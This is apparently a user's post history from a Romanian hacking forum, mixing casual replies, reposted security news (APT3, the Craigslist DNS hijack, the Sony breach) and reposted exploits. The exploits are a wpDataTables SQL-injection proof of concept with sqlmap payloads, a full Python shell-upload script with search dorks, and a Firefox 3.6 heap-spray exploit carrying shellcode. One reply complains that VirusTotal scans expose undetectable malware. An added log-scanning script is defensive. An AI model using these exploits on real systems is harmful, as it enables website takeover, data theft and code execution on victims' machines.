-
Posts
3453 -
Days Won
22
Everything posted by Aerosol
-
If @Eddie91 agrees, I'll give you the password by PM (but he should say whether he wants that). On:// Good job, man, thanks. To give you a hint: the password is encrypted.
-
This needs to be printed
-
@gogusan the people weren't exactly inspired in their choice of "decorations" )
-
A way to download paid iOS games for free.
Aerosol replied to Coco's topic in Programe utile
Heh, heh, it works, cheers, man
-
The content leaves something to be desired, the theme/design is OK; good luck with the site, I have nothing more to say for now.
-
@SticKyWoX I don't know what to say, this hasn't happened to me so far... maybe you were just unlucky.
-
On:// Hi :) :) :) :) :) :) you can use fewer of these ":)", we're not on Messenger, you know... As for the "saits", aka government sites, I doubt you can do anything to them...
-
@SticKyWoX why do you say the products aren't of the best quality, bro? I, for one, am satisfied... did something happen to you?
-
APT3, a group believed to be behind “Operation Clandestine Fox,” is now using exploits targeting recently disclosed vulnerabilities in Windows, researchers at FireEye found.

One of the bugs, CVE-2014-6332, was fixed this Patch Tuesday and noted for being remotely exploitable for 18 years prior to the update. The Windows OLE Automation Array Remote Code Execution vulnerability presented a serious security issue to users, researchers warned, as it impacts every version of Microsoft Windows since Windows 95.

At the time, IBM X-Force Research manager Robert Freeman said that remote exploitation became possible with the release of Internet Explorer 3.0 in 1996, since Visual Basic Script (VBScript) was introduced. In an interview with SCMagazine.com, Freeman explained that exploitation of the bug would be a “tricky” feat, but also “very formulaic” to recreate once saboteurs came up with attack scenarios.

Now, attacks exploiting the bug have appeared to come to fruition, as security firm FireEye detailed in a Friday blog post. According to the company, the Windows OLE bug, and a separate Windows privilege escalation vulnerability, CVE-2014-4113, have been targeted by the threat group called APT3.

Both bugs received a patch from Microsoft (4113 in October's Patch Tuesday and 6332 in this month's update), a sign that APT3 has apparently moved from leveraging zero-day exploits, to targeting victims with “known exploits or social engineering,” FireEye said.

In the Clandestine Fox campaign APT3 carried out, the group was initially observed exploiting an Internet Explorer zero-day to deliver malware to users. Then the group switched up its tactics, wooing new victims via social engineering – in one instance, targeting an energy company by posing as a job applicant seeking employment. The supposed applicant contacted an employee on a popular social networking site, and weeks later emailed a resume to the employee's personal email account, which contained a weaponized file designed to drop a backdoor called “Cookie Cutter.”

In the most recent wave of phishing lures beginning last Wednesday, dubbed “Operation Double Tap,” attackers sent malicious emails claiming to offer a free month's membership to a Playboy website, FireEye warned. On Oct. 28, APT3 was again observed sending spearphishing emails, which ultimately installed backdoor Cookie Cutter on vulnerable users' machines. FireEye published indicators of compromise (IOCs) in its post.

In a Monday interview with SCMagazine.com, John Kuhn, senior threat researcher at IBM X-Force, said that his company had detected separate attacks targeting the Windows OLE bug.

On Monday, Trey Ford, global security strategist at Rapid7, told SCMagazine.com in email correspondence that the exploitation of Windows OLE in the wild demonstrates why there needs to be “several paths forward in a vulnerability disclosure line of conversation.”

Source
-
Around 5:00pm PST on November 23, the Domain Name Service records for at least some of the sites hosted by the online classified ad and discussion service Craigslist were hijacked. At least some Craigslist visitors found their Web requests redirected toward an underground Web forum previously associated with selling stolen celebrity photos and other malicious activities.

In a blog post, Craigslist CEO Jim Buckmaster said that the DNS records for Craigslist sites were altered to direct incoming traffic to what he characterized as “various non-craigslist sites.” The account was restored, and while the DNS records have been corrected at the registrar, some DNS servers were still redirecting traffic to other servers as late as this afternoon.

Craigslist's domain registrar is Network Solutions, which is owned by Web.com. [update, 5:32 PM EST November 24: John Herbkersman, a spokesperson for Web.com, told Ars, “The issue has been resolved. At this time we are continuing to investigate the incident.”]

One site that appeared to receive most of the traffic destined for Craigslist was “Digital Gangster,” an invitation-only Web board owned by rapper and hacker Bryce Case, Jr.—also known as YTCracker. Case gained notoriety in 1999 for hacking into the network of NASA's Goddard Space Flight Center.

DigitalGangster.com advertises itself as being “dedicated to nothing in particular other than being important. It is responsible for millions of dollars in commerce and millions of terrible pranks on the Internet. Be warned: kids have been born as a result of posting here (seriously).” Among other things, members of the site were accused of involvement in the posting of images stolen from Miley Cyrus’ e-mail in 2008.

The forum site now appears to be down as a result of the additional traffic sent its way, which may have been intended as a denial of service attack against the forum. [update: As of 4:27 PM ET, the site is back up, with errant traffic redirected to another site.] The site has been the target of previous denial of service and defacement attacks.

Via Twitter, YTCracker told Ars that "this was a joe job anyway so i just redirected it to my video. I think Obama is behind it."

Source
-
Sony Pictures Entertainment has been targeted by computer hackers in an attack which reports say forced it to shut down its systems on Monday.

A skull appeared on computer screens along with a message threatening to release data "secrets" if undisclosed demands were not met, reports said. The message showed "#GOP" indicating a group called Guardians of Peace was behind the attack.

Sony has issued a statement saying the firm is investigating the "IT matter". The tech firm has reportedly shut down its computer network as a precaution and advised employees that resolving the situation could take anywhere from one day to three weeks.

Meanwhile, an anonymous user on the Reddit news website posted an image allegedly from a Sony computer screen, which said "Warning: We've already warned you, and this is just the beginning… We have obtained all your internal data including secrets and top secrets".

Sony under attack

News of the online attack comes just months after Sony's Playstation network was forced offline by a cyber attack in August.

Wee Teck Loo, head of consumer electronics research at Euromonitor, said any negative news for Sony just "piles" pressure on the company that has been struggling financially in both its TV and mobile business.

Charles Lim, senior industry analyst at ICT, Frost & Sullivan Asia Pacific, however, said the attack has put into question what "multi-layers of prevention" Sony has to detect and handle such risks.

High profile companies like Sony can be targeted and hacked every day, according to consulting firm AT Kearney. In its latest research, the firm said that experts estimate that at least 25% of all companies have already suffered financial loss through some form of cyber attack.

Analysis: Richard Taylor, BBC North America Technology Correspondent

Sony is understandably keen to downplay this latest hacking threat. "We are investigating the matter" is the kind of benign language more commonly used for routine technological issues, not chilling messages threatening to unleash reams of data to the world.

The demands are opaque so it is unclear how damage could be wrought should Sony fail to resolve the situation before the deadline. Sony Pictures has at least reclaimed its compromised Twitter accounts.

Nevertheless, this internal corporate attack does not yet appear to be of the magnitude of previous public breaches that Sony has suffered. But the fact that hackers have again apparently infiltrated Sony's systems will do nothing to restore public faith that the Japanese technology giant has its security affairs in order.

And it is somewhat ironic that Sony has only just dismissed the allegation made by hackers that they had succeeded in breaching the Playstation network earlier this year. This latest attack cannot be so easily dismissed.

Source
-
######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################

# Description

Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability

"table_id" variable is not sanitized.

File: wpdatatables.php
------------------------
// AJAX-handlers
add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );

/**
 * Handler which returns the AJAX response
 */
function wdt_get_ajax_data(){
    $id = $_GET['table_id']; <------------------- Not Sanitized!
    $table_data = wdt_get_table_by_id( $id );
    $column_data = wdt_get_columns_by_table_id( $id );
    $column_headers = array();
    $column_types = array();
    $column_filtertypes = array();
    $column_inputtypes = array();
    foreach($column_data as $column){
        $column_order[(int)$column->pos] = $column->orig_header;
        if($column->display_header){
            $column_headers[$column->orig_header] = $column->display_header;
        }
        if($column->column_type != 'autodetect'){
            $column_types[$column->orig_header] = $column->column_type;
        }else{
            $column_types[$column->orig_header] = 'string';
        }
        $column_filtertypes[$column->orig_header] = $column->filter_type;
        $column_inputtypes[$column->orig_header] = $column->input_type;
    }
------------------------

(The vulnerable variable is located in others php files)

######################

# PoC

http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]

# Sqlmap

sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql

---
Parameter: table_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=get_wdtable&table_id=1 AND 9029=9029

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
---

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Source
-
#!/usr/bin/python # # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability # # Vulnerability discovered by Claudio Viviani # # Date : 2014-11-22 # # Exploit written by Claudio Viviani # # Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc # # -------------------------------------------------------------------- # # Issue n.1 (wpdatatables.php) # # This function is always available without wpdatatables edit permission: # # function wdt_upload_file(){ # require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php'); # $uploadHandler = new UploadHandler(); # exit(); # } # ... # ... # ... # add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' ); # add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' ); # # # Issue n.2 (lib/upload/UploadHandler.php) # # This php script allows you to upload any type of file # # --------------------------------------------------------------------- # # Dork google: inurl:/plugins/wpdatatables # inurl:codecanyon-3958969 # index of "wpdatatables" # index of "codecanyon-3958969" # # Tested on BackBox 3.x # # # http connection import urllib, urllib2, sys, re # Args management import optparse # file management import os, os.path # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file # Create multipart header def create_body_sh3ll_upl04d(payloadname): getfields = dict() payloadcontent = open(payloadname).read() LIMIT = '----------lImIt_of_THE_fIle_eW_$' CRLF = '\r\n' L = [] for (key, value) in getfields.items(): L.append('--' + LIMIT) L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) L.append('Content-Disposition: 
form-data; name="%s"; filename="%s"' % ('files[]', payloadname)) L.append('Content-Type: application/force-download') L.append('') L.append(payloadcontent) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) return body banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ ______ __ _______ __ __ | Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----. |. | | _ |. | \| _ | _| _ |.| | | _ | _ | | -__|__ --| |. / \ | __|. | |___._|____|___._`-|. |-|___._|_____|__|_____|_____| |: |__| |: 1 / |: | |::.|:. | |::.. . / |::.| `--- ---' `------' `---' Sh311 Upl04d Vuln3r4b1l1ty <= 1.5.3 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('-f', '--file', action="store", help="Insert file name, ex: shell.php", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.file: print(banner) commandList.print_help() sys.exit(1) payloadname = checkfile(options.file) host = checkurl(options.target) timeout = options.timeout print(banner) url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file' content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' bodyupload = create_body_sh3ll_upl04d(payloadname) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/36.0.1985.125 Safari/537.36', 'content-type': content_type, 'content-length': str(len(bodyupload)) } try: req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers) response = urllib2.urlopen(req) read = response.read() if "error" in read or read == "0": print("[X] Upload Failed :(") else: backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1) print("[!] Shell Uploaded") print("[!] Location: "+backdoor_location.replace("\\","")) except urllib2.HTTPError as e: print("[X] Http Error: "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source
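
A defender-side check for the two wpDataTables issues posted above (the unsanitized `table_id` in `get_wdtable` and the `wdt_upload_file` handler registered with `wp_ajax_nopriv_`), added here as an example and not part of the original posts or of the plugin: it scans web-server access-log lines for requests to those two AJAX actions. The Combined Log Format, the function names `classify` and `scan`, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a Combined Log Format line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Nov/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=get_wdtable&table_id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Nov/2014:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=get_wdtable&table_id=1%20AND%209029%3D9029 HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Nov/2014:10:00:09 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=wdt_upload_file HTTP/1.1" 200 230',
    '198.51.100.4 - - [22/Nov/2014:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

def classify(line):
    """Return (ip, status, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs URL-decodes values, so encoded payloads are compared in clear.
    # Only query-string parameters appear in access logs; POST bodies do not.
    params = parse_qs(url.query, keep_blank_values=True)
    action = params.get("action", [""])[-1]
    finding = None
    if action == "get_wdtable":
        # A legitimate table id is a plain integer; anything else reached
        # the unsanitized $_GET['table_id'] shown in the advisory.
        ids = params.get("table_id", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            finding = "non-numeric table_id"
    elif action == "wdt_upload_file" and m.group("method") == "POST":
        # The handler needs no login, so every POST here is worth reviewing.
        finding = "POST to wdt_upload_file"
    if finding is None:
        return None
    return (m.group("ip"), int(m.group("status")), finding)

def scan(lines):
    """Collect findings for every suspicious line, in log order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, status, finding in scan(SAMPLE_LOG):
        print(ip, status, finding)
```

A hit on `wdt_upload_file` should be followed by a check of the uploads directory for files that are not data sources the plugin is expected to receive.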
-
<!-- Exploit Author: Juan Sacco Name: Mozilla Firefox 3.6 mChannel ( Universal ) Description: Mozilla Firefox 3.6 is prone to an use-after-free vulnerability in OBJECT mChannel that allows an attacker to execute arbitrary code. Tested on Windows XP SP3 CVE: 2011-0065 --> <html> <head> </head> <body> <pre> # Title: Firefox 3.6 ( Universal ) </pre> <object id="exploit" ></object> <script> function exploit() { var foo=document.getElementById("exploit"); e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0); var vftable = unescape("\x00% u0c10"); var shellcode = unescape("%u0004%u0c10%uBCBB%u68F1%u0105%u0106%uBE51%u6623%u0030%u0c10%u7C2A%u68F0%u5B33%u661C%u0030%u0c10%uF1DD%u68F2%u0030%u0c10%u9000%u0000%u0040%u0000%u0c0c%u0c0c%u0038%u0c10%u9090%u9090%u9090%u9090%uC781%u986D%u0007%u078B%uF505%u03F6%u9000%u9090%u056A%uC181%u008E%u0000%u9051%uF08B%uD0FF%ucccc%uEE81%u95Fa%u0004%uFF6A%uD6FF%uCCCC%u6163%u636c%u652e%u6578%u0000%ucccc"); var vtable = unescape("%u0c0c%u0c0c"); while(vtable.length < 0x10000) {vtable += vtable;} var heapblock = shellcode+vtable.substring(0,0x10000/2-shellcode.length*2); while (heapblock.length<0x80000) {heapblock += shellcode+heapblock;} var finalspray = heapblock.substring(0,0x80000 - shellcode.length - 0x24/2 - 0x4/2 - 0x2/2); var heapspray = new Array() for (var i=0;i<0x100;i++){ heapspray[i] = finalspray+shellcode; } foo.data="";} </script> <input type=button value="Exploit" onclick="exploit()" /> </body> </html> Source
-
Does it show that it's charging (the bars on the battery icon moving), or does just that appear and then it shuts off? It might be a problem with the charger...
-
Bro, you've been here since 2011 and you never learned that you shouldn't scan with VT? Because of you, the FUD goes down the ...
-
@Terry.Crews try making a chair from Minecraft in real life. As for the game, it's not exactly crap, it's fairly OK, but meh...
-
@Htich no, I didn't pay; call them or send them an email...
-
eMAG becomes "Santa Claus": it mistakenly sold products for 1 leu.
Aerosol replied to TheOne's topic in Stiri securitate
Damn, my neighbor ordered a plasma TV for just 2 lei; they called him an hour ago to tell him he'll get it tomorrow. I'll be back with details
-
From what I've seen, you came here only to "destroy saits", so ... On:// Hi